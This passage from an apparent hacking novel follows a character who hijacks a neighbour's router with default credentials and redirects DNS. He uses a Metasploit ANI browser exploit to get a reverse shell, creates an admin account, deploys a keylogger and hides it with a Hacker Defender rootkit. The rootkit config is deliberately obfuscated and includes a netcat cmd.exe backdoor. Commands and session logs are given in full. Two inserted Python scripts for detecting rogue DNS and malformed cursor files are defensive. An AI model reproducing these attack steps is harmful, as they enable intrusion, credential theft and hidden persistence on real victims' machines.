Phoenix clicks on Finish and is presented with the Core control and module management page. He looks over the options. Phoenix glances at the first option in the list, which is the network discovery option. He quickly decides he doesn’t have time for this, nor does he need it because he already did discovery with Nmap. Phoenix goes right for the pentesting option. So he clicks on the Network and Penetration testing link and is presented with the Penetration Wizard. Phoenix clicks Next and is presented with the option to pick the Select a Host list or enter a range of IPs. Again, with time being the crucial factor, Phoenix simply enters the single IP of the Vista computer he’s discovered on the network. Figure 5.13 illustrates the target selection.

Figure 5.13 Target selection

Phoenix accepts the defaults on the next three screens, which ask about speed, target exploitation methodology, and whether or not to use exploits that could also crash the target. Phoenix ponders this decision for a moment and then chooses not to use those exploits and to use only safer ones. Besides, the machine being DoS’d does him no good. Phoenix clicks Finish and like magic, Core Impact goes to work looking for vulnerabilities and then immediately trying to exploit them. The software runs for about 1 minute and comes back with nothing. “Is this Vista box really that tight?” Phoenix asks himself. “I probably didn’t configure something right, and right now I don’t have time to learn this program. I’ll have to go at this manually.” At that instant Phoenix remembers reading an article written by a prominent hacker. In the article the hacker claimed that in his neighborhood, most of the access points he found were still configured with the default username and password for the router management login. “It’s a long shot, but it’s worth a try.” Phoenix then fires off an Nmap scan against the default gateway, just as he did against the Vista box.

The results are as follows:

MAC Address: 00:21:29:8B:D8:FC (Cisco-Linksys)
Device type: WAP
Running: Linksys embedded, Netgear embedded
OS details: Linksys WRT54G or WRT54G2, or Netgear WGR614 or WPN824v2
Broadband router
Network Distance: 1 hop

The results come back and tell him the access point is most likely a Netgear. Phoenix goes back to his Web browser and browses to www.defaultpasswordlist.com. Figure 5.14 shows the defaultpasswordlist.com page.

Figure 5.14 The defaultpasswordlist.com Web site listing of vendor default passwords

Phoenix looks at the long list of default Netgear passwords and now has to go through the process of guessing which model is probably installed in the home of the Quizzi guy. Phoenix knows that the Netgear WGR614 is the most commonly sold router for home use. So, he gambles and gives it a try. Phoenix replaces the www.defaultpasswordlist.com URL in his browser with the IP address of the default gateway from his IP settings, which is also the IP address of the Linksys router. As expected, Phoenix is presented with an authentication page that asks for a username and password. He enters the default credentials: administrator as the username and password as the password. Phoenix is instantly excited and smiling again as the router configuration page flashes up on his screen. Phoenix clicks on the WAN settings icon and suddenly hits a mental block. “This is all great, but how is it going to get me access to the Vista machine? What the hell am I doing here?” Phoenix takes his hand off the keyboard and takes a deep breath. Phoenix realizes he needs to come up with a plan, and quickly. This is not one of those times where he has days to construct a cool, elaborate hack that will be sure to wow his other friends in the underground. Phoenix thinks, “I have his router, I own it, it’s mine now. How can I get to that box, though?”

All kinds of ideas run through Phoenix’s head. And as he glances at the screen again, an idea comes to mind. “DNS is the key. That’s how I can perform a client-side attack. Maybe I can poison the DNS records and put a bogus A record in there that points Yahoo! or some other site the Quizzi guy might visit to an exploit-loaded version of Yahoo! I have waiting.” Phoenix looks at the screen again and then realizes that the router doesn’t actually hold any A records because it simply forwards all DNS queries out to the ISP DNS server. “Bad idea,” Phoenix says to himself as if calling himself an idiot. Then another idea hits Phoenix. “Maybe I can set up a DNS server myself, point the router to it for DNS, and configure my DNS server to forward all requests to a real DNS server on the Web. Hey, I’ll just forward to the ISP’s DNS server! Put a bogus A record on my DNS server that points http://www.google.com to a Web server I have waiting that will automatically load an exploit or Trojan.” Phoenix thinks about it and snaps his fingers. “That should actually work!” Then the excitement subsides slightly as Phoenix realizes he has to put some real work in and have everything in place and running before the Quizzi guy gets home and tries to use the Internet. Here are the steps in setting up the attack Phoenix is planning:

1.   Load a Metasploit client-side attack that starts an Apache server, waits for a connection from a vulnerable machine running a vulnerable Web browser, and then drops a payload on that machine.

2.   Build a DNS server that holds an A record that will resolve www.google.com to the IP address of the waiting exploit loaded Apache server (created in step 1).

3.   Configure the wireless access point to point to the DNS server created in step 2.

4.   Wait for any user on the wireless network to attempt to browse to www.google.com, which sends them to the Apache server and launches an exploit against their Web browser.

5.   The exploit should now give Phoenix privileged access to the infected computer.
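
The five steps above hinge on the access point handing clients a resolver that answers www.google.com with an address on the LAN. The script below is an added example, not code from the book: it shows the check a defender can run from any client on such a network by sending a raw DNS A query straight to a named resolver, parsing the reply, and flagging a public hostname that resolves to a private address. The function names, the constructed sample reply and the resolver addresses are this example’s own assumptions.

```python
"""Rogue-resolver check for a DNS-redirect attack on a home LAN.

Added example (not the book's code): build a raw DNS A query, send it to one
resolver, parse the reply, and flag public hostnames that resolve to private
addresses, which is what a LAN-hosted fake www.google.com record looks like.
"""
from __future__ import annotations

import ipaddress
import socket
import struct

DNS_PORT = 53


def build_a_query(name: str, txid: int = 0x1234) -> bytes:
    """Encode a standard recursive query (RD=1) for the A record of `name`."""
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    qname = b"".join(bytes([len(label)]) + label.encode("ascii")
                     for label in name.rstrip(".").split("."))
    return header + qname + b"\x00" + struct.pack(">HH", 1, 1)  # QTYPE=A, QCLASS=IN


def _read_name(msg: bytes, offset: int) -> tuple[str, int]:
    """Decode a (possibly compressed) domain name; return (name, offset after it)."""
    labels: list[str] = []
    end = offset
    jumped = False
    while True:
        length = msg[offset]
        if length & 0xC0 == 0xC0:  # compression pointer, RFC 1035 section 4.1.4
            if not jumped:
                end = offset + 2
            jumped = True
            offset = struct.unpack(">H", msg[offset:offset + 2])[0] & 0x3FFF
            continue
        offset += 1
        if length == 0:
            break
        labels.append(msg[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), (end if jumped else offset)


def parse_a_answers(msg: bytes) -> list[str]:
    """Return the IPv4 addresses in the answer section of a DNS reply."""
    _txid, flags, qdcount, ancount, _ns, _ar = struct.unpack(">HHHHHH", msg[:12])
    if flags & 0x000F:  # non-zero RCODE (NXDOMAIN, SERVFAIL, ...): no answers
        return []
    offset = 12
    for _ in range(qdcount):  # skip the echoed question section
        _name, offset = _read_name(msg, offset)
        offset += 4  # QTYPE + QCLASS
    addresses = []
    for _ in range(ancount):
        _name, offset = _read_name(msg, offset)
        rtype, rclass, _ttl, rdlen = struct.unpack(">HHIH", msg[offset:offset + 10])
        offset += 10
        if rtype == 1 and rclass == 1 and rdlen == 4:  # A record, IN class
            addresses.append(socket.inet_ntoa(msg[offset:offset + 4]))
        offset += rdlen
    return addresses


def suspicious_answers(addresses: list[str]) -> list[str]:
    """Addresses a public hostname should never resolve to: RFC 1918,
    loopback and link-local ranges all count as private in ipaddress."""
    return [a for a in addresses if ipaddress.ip_address(a).is_private]


def constructed_rogue_reply(txid: int = 0x1234) -> bytes:
    """Constructed sample reply (not captured traffic): what a fake google.com
    zone whose www record points at 192.168.1.10 would send back."""
    question = build_a_query("www.google.com", txid)[12:]
    header = struct.pack(">HHHHHH", txid, 0x8180, 1, 1, 0, 0)  # QR=1 RD=1 RA=1
    answer = (b"\xc0\x0c"                                    # pointer to the qname
              + struct.pack(">HHIH", 1, 1, 300, 4)
              + socket.inet_aton("192.168.1.10"))
    return header + question + answer


def check_resolver(resolver_ip: str, name: str, timeout: float = 2.0) -> list[str]:
    """Query `resolver_ip` directly over UDP and return any flagged addresses."""
    query = build_a_query(name)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(query, (resolver_ip, DNS_PORT))
        reply, _peer = sock.recvfrom(4096)
    if reply[:2] != query[:2]:
        raise ValueError("DNS transaction id mismatch")
    return suspicious_answers(parse_a_answers(reply))


if __name__ == "__main__":
    import sys

    # Offline demonstration on the constructed reply, then an optional live
    # check: python3 dnscheck.py <resolver-ip> [hostname]
    print("constructed reply flags:",
          suspicious_answers(parse_a_answers(constructed_rogue_reply())))
    if len(sys.argv) > 1:
        host = sys.argv[2] if len(sys.argv) > 2 else "www.google.com"
        print(sys.argv[1], host, "->", check_resolver(sys.argv[1], host))
```

Run it once against the resolver DHCP handed you and once against a resolver you trust; a private address in the first answer and not the second is the tell for this kind of redirect.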

Building the Exploit Infrastructure

With his plan clearly in place, Phoenix begins to put the pieces in place he’ll need for the exploit. He starts by building the DNS server. Phoenix opens his VMware window and starts up a preinstalled Windows 2003 virtual machine he’s built just for situations like this.

Phoenix pauses for a minute and thinks to himself. “I really need to sketch this out so that I don’t lose track of what I’m trying to do.” He starts Microsoft Visio and quickly lays out the plan. Figure 5.15 shows Phoenix’s plan.

Figure 5.15 Phoenix’s sketch of his setup and environment

Phoenix realizes that he’ll have to modify only the entry in the access point that specifies the primary DNS server. He’ll have to leave any secondary servers specified as is. This will allow his own DNS server, which will be running on his VMware 2003 server instance, to actually resolve external domains. Phoenix, now satisfied with his plan, continues building the DNS server. On his 2003 virtual machine, he selects Start, All Programs, Administrative Tools, DNS. Figure 5.16 shows Phoenix accessing the DNS configuration.

Figure 5.16 Getting into the DNS configuration

After selecting DNS, an hourglass pops up on the screen and stays there for a few seconds, and then the DNS screen appears. Phoenix right-clicks on the existing forward lookup zone he’s used for testing and selects New Zone. Figure 5.17 shows Phoenix creating a new DNS zone.

Figure 5.17 Creating a new zone in Windows 2003 Server DNS snap-in

After selecting New Zone, Phoenix is prompted to click Next to continue inside the DNS Zone Creation Wizard. He selects Next and is asked to select the kind of zone he wants to create. It’s important to note that Phoenix selects Primary Zone here because he doesn’t want the DNS server to try and serve as a child or secondary server to the real google.com. In other words, he doesn’t want his fake DNS server to go out and ask Google DNS servers for a zone transfer! So, Phoenix selects Primary Zone. Figure 5.18 shows Phoenix completing the zone creation in DNS.

Figure 5.18 Selecting Primary Zone as the zone type

Next Phoenix inputs google.com as the zone name. Figure 5.19 shows the google.com zone being created.

Figure 5.19 Creating the google.com DNS zone

After this step, Phoenix accepts the defaults on the remaining questions Windows asks. Then he clicks Finish. Now the new zone shows up in his DNS configuration. Figure 5.20 shows the completion of the new google.com zone.

Figure 5.20 Completed google.com zone creation

Now all that’s left to do is to create the A record for www.google.com and set the forwarders. Phoenix has already created the zone and now just needs to add the host record for www. Phoenix moves his cursor to the right-hand pane of the DNS snap-in and right-clicks in the white space. From the resulting drop-down list, Phoenix selects New Host (A) Record. Phoenix then inputs the IP address his Backtrack VM leased from Quizzi’s wireless access point, and then simply types www in the name area. Figure 5.21 shows the A record creation for www.google.com.

Figure 5.21 Creating the A record for www.google.com

Phoenix now needs to configure the DNS server to forward all queries for names it isn’t authoritative for to a real DNS server. Phoenix goes back to his notes and takes a look at the configuration he got from the WAN side (the Internet side, connected to Quizzi’s ISP router), and writes down the primary and secondary DNS server addresses. Now Phoenix goes back to his 2003 VM and in the DNS configuration panel, he right-clicks the DNS server itself and selects Properties. Phoenix then selects the Forwarders tab. He then enters the DNS server IP addresses he copied from the Quizzi wireless WAN side configuration. Figure 5.22 shows the configuration of DNS forwarders.

Figure 5.22 Configuring DNS forwarders

“Okay,” Phoenix says to himself. “If I have this right, I should be able to go to my host box’s DNS configuration and point to this DNS server for DNS. Then when I enter www.google.com, I should end up at my Backtrack VM instead of the real www.google.com.” Phoenix is now starting to realize the complexity of the attack he’s trying to pull off. For a moment he second-guesses himself and wonders if he’s making this too complex. But that thought lasts for only a few seconds. With that, Phoenix opens his Backtrack VM and starts up tcpdump. “I first need to see whether I can get the query to go there before I waste time building the exploit infrastructure.” With tcpdump running in his Backtrack VM, Phoenix goes to his 2003 VM and tries to browse to the Backtrack VM IP via Internet Explorer. Phoenix knows he hasn’t set up a Web server on the Backtrack VM yet, so he knows the attempts to browse to it should show up in tcpdump. So, Phoenix enters the command tcpdump:

12:17:49.032688 IP 192.168.1.22.http > 192.168.1.10.1041 R 0:0(0) ack 1 win 0

Testing the Exploit

Phoenix is happy with that result. Now Phoenix goes to his host machine and sets the primary DNS to the IP address of his 2003 VM. With this set he tries to browse to www.google.com. As expected, he gets a Page Cannot Be Displayed error. Phoenix then goes back to the Backtrack tcpdump instance and sees that there’s been another attempt to connect to the Backtrack VM via HTTP, except this time the source IP address was that of his host box. “Yeah! I have the DNS working. Now I just need to get Apache working on the Backtrack VM. I need to find out a little more about the client-side exploit that’s supposed to work against Windows Vista.” Phoenix again goes to the Web and browses to www.metasploit.org and starts to read the forums there. After an hour of reading, he has discovered that the exploit runs an Apache server, which serves a malformed HTML page to whatever browser happens to connect to it. Phoenix decides he’s read enough and goes ahead and tries setting up the exploit. He opens Metasploit in Backtrack and issues the show exploits command, which produces the result shown in Figure 5.23.

Figure 5.23 Loading Metasploit in Backtrack

Phoenix scrolls through the list of the over 300 exploits and soon finds the one he’s looking for. Phoenix copies the exploit name, types the use command, and then pastes the exploit name.

Phoenix continues and enters the other required options. He first enters the SRVPORT option, which is required to determine which port the Apache Web server will listen on—he specifies 80 there. Next he specifies the LHOST option, which is the IP address of his Backtrack VM because this is where he wants the resulting exploit to spawn the generic shell to. Next Phoenix enters the LPORT option and sets it to 7371. Last he enters the URIPATH, which is what will have to be entered into the browser of the client to get it to the right place for the exploit. For example, if Phoenix set the URIPATH to hackme, the victim would have to enter the IP address of the Backtrack VM plus that path, which would look something like http://192.168.1.10/hackme. But because Phoenix wants the exploit to load via a redirect from a DNS server, he specifies only the forward slash, which means no URI need be included. The following is what the exploit looks like with all necessary options configured:

msf > use windows/browser/ani_loadimage_chunksize
msf exploit(ani_loadimage_chunksize) > set PAYLOAD generic/shell_reverse_tcp
PAYLOAD => generic/shell_reverse_tcp
msf exploit(ani_loadimage_chunksize) > set LHOST 192.168.1.10
LHOST => 192.168.1.10
msf exploit(ani_loadimage_chunksize) > set LPORT 7371
LPORT => 7371
msf exploit(ani_loadimage_chunksize) > set SRVPORT 80
SRVPORT => 80
msf exploit(ani_loadimage_chunksize) > set URIPATH /
URIPATH => /
msf exploit(ani_loadimage_chunksize) > exploit

With the options loaded, Phoenix enters the exploit command. After entering exploit, Metasploit seems to do nothing for about 15 seconds. Then the screen scrolls slightly and Phoenix sees that his exploit is loaded and waiting. Figure 5.24 shows the exploit successfully configured and loaded.

Figure 5.24 Exploit successfully configured and loaded

Now for the real test: Phoenix goes to VMware and loads a Vista VM he’s been using to test his applications on. After it starts, he simply opens Internet Explorer and browses to the IP address of the Backtrack VM. Phoenix jumps out of his seat and lets out a yelp as he sees that the exploit appears to have worked. Looking at the browser, he sees the random data thrown at it, which according to the forums is what’s supposed to happen.

One other thing that really attracted Phoenix to this client-side exploit is that once the user browses to the infected page, he cannot exit Internet Explorer without manually ending the iexplore.exe process from Task Manager. In other words, that exploit locks the user in. Next Phoenix switches back to his Backtrack VM to see whether the exploit shows as successful on that side. Phoenix is delighted to see the Metasploit screen in Backtrack shows him a shell is waiting for his control:

msf exploit(ani_loadimage_chunksize) > exploit
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://127.0.0.1:80/
[*] Server started.
[*] Exploit running as background job.
msf exploit(ani_loadimage_chunksize) >

[*] Sending HTML page to 192.168.1.100:1046...
[*] Sending ANI file to 192.168.1.100:1046...
[*] Command shell session 1 opened (192.168.1.10:7371 -> 192.168.1.100:1047)

Phoenix goes ahead and presses Enter. This takes him back to the exploit prompt in Metasploit. Following the instructions from the Metasploit forums, Phoenix now types the following command: sessions -i 1 (specifying 1 as the session he wants to connect to). Phoenix has another rush of excitement as he presses Enter and is immediately presented with a shell prompt that shows him he’s connected to the target with local system privileges. Confident that his exploit will work, Phoenix is set. Now he just needs to wait for the Quizzi dude to connect and try to go to Google. Phoenix is trusting that someone on Quizzi’s home network will attempt to browse to www.google.com.
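
The ANI file the Metasploit module sends to the browser is a RIFF container whose anih header chunk carries a bogus size, which is what the module name refers to. The checker below is an added example, not code from the book, and shows the structural validation a defender can apply to cursor files in a scanner or at a mail gateway: every anih chunk must be exactly 36 bytes and there must be only one of them. The function names and the constructed fixtures are this example’s own.

```python
"""Structural check for Windows animated-cursor (.ani) files.

Added example (not the book's code): walk the RIFF/ACON container, including
nested LIST chunks, and report any 'anih' header chunk whose declared size is
not the 36 bytes the format defines, or any second 'anih' chunk. Either makes
the file malformed, which is what the chunk-size exploit above relies on.
"""
from __future__ import annotations

import struct

ANIH_SIZE = 36  # sizeof(ANIHEADER): nine 32-bit fields


def iter_chunks(data: bytes, start: int, end: int):
    """Yield (fourcc, payload_offset, declared_size) for each chunk in data[start:end]."""
    pos = start
    while pos + 8 <= end:
        fourcc = data[pos:pos + 4]
        size = struct.unpack("<I", data[pos + 4:pos + 8])[0]
        yield fourcc, pos + 8, size
        pos = pos + 8 + size + (size & 1)  # chunk payloads are padded to even length


def find_anih_problems(data: bytes) -> list[str]:
    """Return a list of findings; an empty list means the container is sane."""
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"ACON":
        return ["not a RIFF/ACON animated cursor"]
    findings = []
    riff_size = struct.unpack("<I", data[4:8])[0]
    if riff_size + 8 > len(data):
        findings.append(f"RIFF size {riff_size} overruns a {len(data)}-byte file")
    end = min(len(data), riff_size + 8)
    anih_count = 0
    pending = [(12, end)]  # (start, end) ranges still to walk; LISTs push their body
    while pending:
        start, stop = pending.pop()
        for fourcc, payload, size in iter_chunks(data, start, stop):
            if payload + size > stop:
                findings.append(f"{fourcc.decode('latin-1')} chunk at {payload - 8} declares "
                                f"{size} bytes past the end of its container")
                break
            if fourcc == b"anih":
                anih_count += 1
                if size != ANIH_SIZE:
                    findings.append(f"anih chunk at {payload - 8} declares {size} bytes, "
                                    f"expected {ANIH_SIZE}")
                if anih_count > 1:
                    findings.append(f"extra anih chunk at {payload - 8}")
            elif fourcc == b"LIST":
                pending.append((payload + 4, payload + size))  # skip the 4-byte list type
    return findings


def riff_chunk(fourcc: bytes, payload: bytes) -> bytes:
    """Encode one RIFF chunk with the even-length padding the format requires."""
    pad = b"\x00" if len(payload) & 1 else b""
    return fourcc + struct.pack("<I", len(payload)) + payload + pad


def build_sample_ani(anih_payload: bytes, extra_chunks: bytes = b"") -> bytes:
    """Constructed test fixture: a minimal RIFF/ACON wrapping one anih chunk."""
    body = b"ACON" + riff_chunk(b"anih", anih_payload) + extra_chunks
    return b"RIFF" + struct.pack("<I", len(body)) + body


# A well-formed 36-byte header: cbSizeof, cFrames, cSteps, cx, cy, cBitCount,
# cPlanes, JifRate, flags (the field values are the fixture's own).
SANE_ANIH = struct.pack("<9I", 36, 1, 1, 32, 32, 32, 1, 10, 1)


if __name__ == "__main__":
    import sys

    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as fh:
            findings = find_anih_problems(fh.read())
    else:
        findings = find_anih_problems(build_sample_ani(SANE_ANIH))
    print("\n".join(findings) or "no structural problems found")
```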

Now, with everything set, Phoenix goes ahead and connects back to the wireless access point and clicks on the WAN Configuration icon. Phoenix changes the primary DNS server to that of his 2003 Server VM and clicks Save. He then goes to his host machine, which gets its DHCP settings from the access point. He clears the cache on his copy of Internet Explorer and types www.google.com into the URL area. As his browser appears to hang, Phoenix suspects that he’s succeeded. He goes back to his Backtrack VM to see whether it shows the connection he just tried to make to Google and to verify that the wireless access point pointed him to the right place. Suddenly Phoenix’s browser screen is filled with what appears to be random garbled text. This lets him know the exploit has been sent from Metasploit, which is running inside Backtrack.

[*] Started reverse handler
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://127.0.0.1:80/
[*] Server started.
[*] Exploit running as background job.
msf exploit(ani_loadimage_chunksize) >
[*] Sending HTML page to 192.168.1.100:1046...
[*] Sending ANI file to 192.168.1.100:1046...
[*] Command shell session 1 opened (192.168.1.10:7371 -> 192.168.1.100:1047)

msf exploit(ani_loadimage_chunksize) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows [Version 6.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\Users\Administrator\Desktop>

Figure 5.25 shows Internet Explorer being exploited by the ani chunksize exploit.

Figure 5.25 Internet Explorer being conquered by the ani chunksize exploit

Phoenix goes back to his Backtrack VM and pats himself on the back as he sees a second session being opened to a different IP address—the IP address of his host machine.

[*] Local IP: http://127.0.0.1:80/
[*] Server started.
[*] Exploit running as background job.
msf exploit(ani_loadimage_chunksize) >
[*] Sending HTML page to 192.168.1.100:1046...
[*] Sending ANI file to 192.168.1.100:1046...
[*] Command shell session 1 opened (192.168.1.10:7371 -> 192.168.1.100:1047)

msf exploit(ani_loadimage_chunksize) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>[*] Sending HTML page to 192.168.1.100:1055...

[*] Sending ANI file to 192.168.1.100:1055...
[*] Command shell session 2 opened (192.168.1.10:7371 -> 192.168.1.101:1056)

Now Phoenix needs to clear everything up and make sure he has a clean exploit waiting for the Quizzi dude whenever he finally comes home and tries to browse to Google. Phoenix enters the rexploit command, which stops the running exploit job and reloads it.

[*] Command shell session 1 closed.
msf exploit(ani_loadimage_chunksize) > rexploit
[*] Stopping existing job...
[*] Server stopped.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://127.0.0.1:80/
[*] Server started.
[*] Exploit running as background job.
msf exploit(ani_loadimage_chunksize) >

Now it’s a waiting game. While Phoenix sits and thinks, he realizes he hasn’t decided exactly what he needs to do once he has access to a Quizzi system. Just as he’s about to answer that question for himself, his phone rings. Looking at the unknown number, he suspects it’s his “employer” calling to see how well he’s coming along. Phoenix answers the phone and before he can say hello, the man on the other end starts talking. “We’ve been keeping track of what you’ve been doing. It turns out that we were able to plant someone inside Grethrip Harmon. We still need you to finish, but the goal has changed. We know you’ve been working toward getting in via a trusted third party. What you need to do now is get a keylogger on the system in which they run the visualization program. You’ll need to have the keylogger dump its captures out to an FTP server. When you have it all set up, we’ll call you and get the credentials to get to the FTP server. You’ll find more money at your house in the kitchen pantry when you get back home. I don’t need to remind you that time is of the essence. So, hurry up.” Phoenix is about to ask some questions when the man abruptly hangs up the phone. “$%*&,” Phoenix yells. To Phoenix it seems as if the guys knew exactly where he was, what he was doing, and exactly how far he had gotten toward accomplishing the objective. Even though it sounds impossible, Phoenix somehow has an uncanny feeling that they know EXACTLY where he is and what he’s doing.

Phoenix thinks about which keylogger mechanisms behave in the way the man described. “I could code something from somebody else’s code and modify it a bit, but I don’t have time for that,” Phoenix says to himself. He searches the Web for 10 minutes and realizes this could take a while. Phoenix fires off an e-mail to one of his underground associates known as Slack, and asks whether he knows of a keylogger that dumps its captures out to an FTP site if specified. The e-mail is out of Phoenix’s outbox no more than 5 minutes before he already has a response. Slack suggests Phoenix use something called Fearless Keylogger. Without wasting any more time, Phoenix goes to the link Slack provided and gets the keylogger. As always, Phoenix starts reading the documentation. The instructions are straightforward: Configure the keylogger with your specific options, such as FTP server address, path, and so on. “This seems like a piece of cake,” Phoenix says to himself. He opens the executable for the keylogger and is presented with a simple, yet practical interface.

Phoenix clicks Logging Options and fills in the FTP information the man on the phone sent him via a text message shortly after their last call. Figure 5.26 shows Phoenix’s configuration of the logging options.

Figure 5.26 Configuring logging options in Fearless Keylogger

Next Phoenix finishes by configuring the server options. Figure 5.27 shows the server options being configured.

Figure 5.27 Configuring the server options in the keylogger

Now Phoenix clicks the Build Server button and gets a confirmation message letting him know that the keylogging server.exe program is built and configured. Figure 5.28 illustrates the program after it’s successfully built the keylogger.

Figure 5.28 Keylogger successfully built

“Back to the waiting game,” Phoenix says. An hour passes and there’s still no sign of anyone entering or exiting the apartment building across the street where the Quizzi guy lives. Phoenix immediately has another idea. He knows that he’ll need to find a way to hide his keylogger after he installs it on the Quizzi computer. He also plans to push the same keylogger via Quizzi into the Visual IQ program and eventually have it end up inside Grethrip Harmon. Rootkits come to mind. “I’ve got nothing but time,” says Phoenix, “I might as well.” Phoenix knows about two rootkits that are configurable and relatively easy to load: Hacker Defender and AFXRootkit 2005. Phoenix is familiar with both but he decides to start with AFXRootkit 2005. The premise behind it is to create any folder on a Windows PC, put the root.exe file in that folder, and then execute it using the /i switch, which renders that folder and everything in it invisible to Windows. It’s been a while since Phoenix has used either rootkit, so he begins by copying the rootkit folder, which he downloaded from a friend’s FTP server, to the desktop of his Vista VM. In the folder he sees the content shown in Figure 5.29.

Figure 5.29 AFXRootkit 2005 folder contents


As instructed in the readme.txt file, Phoenix creates a new folder named temp. He then copies the root.exe file to that folder, as shown in Figure 5.30.

Figure 5.30 AFXRootkit 2005 copied to a temp folder


He goes to Start, Run and types the full path of the folder he just created and ends the path with root.exe /i, as shown in Figure 5.31.

Figure 5.31 AFXRootkit 2005 root.exe being launched with the /i option


Almost immediately Phoenix gets a blue screen as his Vista VM goes into a reboot cycle. If Phoenix had read the entire readme.txt file, he would have seen that it clearly said the kit was for NT, XP, and 2003 only. “Well, I guess I better take a look at Hacker Defender then.”

Executing the Hack

But just as Phoenix utters those words, he notices movement on his Backtrack VM screen. In that instant he sees that he has just gotten a shell connection, almost certainly from one of the Quizzi guys:

[*] Exploit running as background job.
msf exploit(ani_loadimage_chunksize) >
[*] Sending HTML page to 192.168.1.105:1058...
[*] Sending ANI file to 192.168.1.105:1058...
[*] Command shell session 3 opened (192.168.1.10:7371 -> 192.168.1.105:1059)

Phoenix wastes no time. He knows that the exploit has the person on the other end more or less locked in: once the attack hits the victim’s browser, the victim loses control of that browser session entirely and can break the exploit only by killing the IE process. Phoenix immediately presses Enter and types the same sessions command he typed earlier in his test, except this time he selects session 3.

[*] Command shell session 3 opened (192.168.1.10:7371 -> 192.168.1.105:1059)

msf exploit(ani_loadimage_chunksize) > sessions -i 3
[*] Starting interaction with 3...

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>

As soon as he sees the command line of the exploited Windows machine pop up, Phoenix notices something. The command line and the Windows version displayed point to it being either XP or 2003. “Okay, so I’m up against 2003 after all,” Phoenix says to himself and immediately goes to work. He quickly does what comes naturally and creates an account for himself on the box. He types the usual net user commands to create an account and then adds it to the local Administrators group.

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>net user phoenix /ADD
net user phoenix /ADD
The command completed successfully.

C:\Documents and Settings\Administrator\Desktop>net localgroup administrators phoenix /ADD
net localgroup administrators phoenix /ADD
The command completed successfully.

C:\Documents and Settings\Administrator\Desktop>

After Phoenix has his account created on the exploited box, he TFTPs to his waiting 2003 box, which hosts his TFTP server and stores thousands of tools. Phoenix pulls down the server.exe he created earlier, which is really the keylogger, and then launches it by typing server.exe at the command prompt.

C:\~\Desktop>tftp -i 192.168.1.40 GET server.exe
Transfer successful: 16059 bytes in 1 second.
C:\~\Desktop>server.exe
server.exe

Constructing the Rootkit

Now it’s time to build a rootkit. He’ll need to hide the server.exe process, and Phoenix chooses Hacker Defender because it’s the kit he has the most experience with. He goes to the same 2003 VM that hosts his tools and the TFTP server to start building the Hacker Defender package he will put on the compromised host. Before he does, Phoenix realizes that the Quizzi guy is probably looking at what was supposed to be the Google home page and wondering what all those funky characters on the resulting Web page are about. By now this person has probably tried to close the browser and wasn’t able to, and the next logical move is to go to Task Manager and kill the IE process. Phoenix puts his rootkit idea on hold, because he already has an administrator account on the compromised box.

That means he can connect to it again “normally” any time he wants. So, with that, he quickly browses again to the IP address of the Quizzi wireless access point. This time he logs in and changes the primary DNS server address back to that provided by the ISP. This way, the infected Quizzi computer will now be able to get to the real Google once his cache is cleared out. “Now back to the rootkit,” Phoenix says. He now goes back to the 2003 VM that’s holding all his tools and hosting the TFTP server, which he just used to pull down the keylogger. He opens a folder on the C: drive he has appropriately named kits. Inside the folder is another folder named hxdef, his Hacker Defender folder. Phoenix opens the folder and examines the files inside. Figure 5.32 shows the contents of the folder.

Figure 5.32 Contents of the Hacker Defender rootkit folder


First Phoenix renames the server.exe file to hxdefserver.exe—doing so makes the process automatically invisible to Windows (and some antivirus software) once the rootkit is running. He then copies the renamed file to the same folder, hxdef. Phoenix knows that he’ll need the process to start up automatically each time Windows starts, and having a netcat backdoor running would be great as well. With that idea in mind he creates a new file named hxdef100.ini, which is required for Hacker Defender to work. It is basically the configuration file that tells the rootkit what to do. Hacker Defender ignores the characters | < > : \ / " when it reads this file, so the stray symbols in the listing below are deliberate padding that breaks signature matching on the configuration, not typos. He opens Notepad and begins typing the following:

[H<<<idden T>>a/"ble]
>h"xdef"*

[<Hi<>dden" P/r>oc"/e<ss>es\]
>h"xdef"*

"[::R:o:o:t: :P:r>:o:c<:e:s:s:e<:s:>]
h< x>d<e>:f<*
< c:md. exe

/[/H/idden Ser:vi"ces]
Ha>:ck"er//Defender*
/
[Hi:dden R/">>egKeys]
Ha:"c<kerDefe/nder100
LE":GACY_HACK/ERDEFEND:ER100
Ha:"c<kerDefe/nderDrv100
LE":GACY_HACK/ERDEFEND:ERDRV100
/
"[Hid:den> :RegValues]"""
////
:[St/artup Run/]
c:\temp\hxdefserver.exe
c:\temp\nc.exe?-L -p 100 -t -e cmd.exe

":[Fr<ee>> S:"<pa>ce]

"[>H>i>d"d:en<> P/:or:t<s"]:
TCPI:
TCPO:
UDP:

[Set/tin/:gs] /
P:assword=hxdef-phoenix
Ba:ckd:"oor"Shell=hxdef$$.exe
Fil:eMappingN/ame=_.-=[Hacker Defender]=-._
Serv:iceName=HackerDefender100
>Se|rvi:ceDisp<://la"yName=HxD Service 100
Dri<ve N:ame=HackerDefenderDrv100
D:riv>erFileNam/e=hxdefdrv.sys

Phoenix saves the file from Notepad as hxdef100.ini, making sure the file type is set to All Files. He has already copied the server.exe file and launched it, which started the keylogger, but it might not start again at boot, and a savvy desktop tech would quickly spot the process. So he copies the renamed version, hxdefserver.exe, along with all the other files in the hxdef folder into the TFTP folder so that he can download them from the compromised machine. Now that they’re all there, Phoenix goes back to the command line of the compromised host in his Backtrack VM, creates a directory named temp on the root of C:, and starts the TFTP copying again. Finally, he starts the Hacker Defender process, hxdef100.exe, which instantly hides all of his malicious files:

C:\~\Administrator\Desktop\New Folder\hxdef>hxdef100.exe

